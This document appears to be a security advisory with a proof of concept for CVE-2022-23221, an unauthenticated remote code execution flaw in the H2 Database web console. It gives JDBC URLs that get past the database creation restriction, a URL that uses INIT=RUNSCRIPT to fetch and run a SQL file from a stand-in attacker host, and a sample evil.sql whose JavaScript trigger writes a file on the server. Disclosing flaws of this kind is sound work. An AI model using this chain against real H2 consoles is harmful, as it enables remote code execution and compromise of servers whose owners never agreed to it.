Document Title
===============
Unauthenticated RCE vuln in the H2 Database console: CVE-2022-23221.

Product Description
===============
The H2 Console Application

The Console lets you access a SQL database using a browser interface.

Homepage: http://www.h2database.com/html/quickstart.html
Affected Components
===============
File Name: WebServer.java
File Path: /h2database/h2/src/main/org/h2/server/web/WebServer.java
Impacted Function: getConnection

PoC
===============

1) Navigate to the console and attempt to connect to a H2 in memory
database that does not exist using the following JDBC URL:

```
jdbc:h2:mem:1337;
```

2) Note that you get the following security exception preventing you
from creating a new in memory database:

```
Database "mem:1337" not found, either pre-create it or allow remote
database creation (not recommended in secure environments) [90149-209]
90149/90149 (Help)
```

3) Now try again with the following JDBC URL:

```
jdbc:h2:mem:1339;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;'\
```

4) Note that you were able to successfully create a new in memory database
5) Create a SQL file that contains a trigger that executes
java/javascript/ruby code when executed and host it on a domain you
control (ex: http://attacker)
6) Use the following JDBC URL to execute the SQL file hosted on your
domain on connect:

```
jdbc:h2:mem:1337;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT
FROM 'http://attacker/evil.sql';'\
```

Example evil.sql file:

```
CREATE TABLE test (
     id INT NOT NULL
 );

CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript
var fos = Java.type("java.io.FileOutputStream");
var b = new fos ("/tmp/pwnedlolol");';

INSERT INTO TEST VALUES (1);
```

CVE Issued: CVE-2022-23221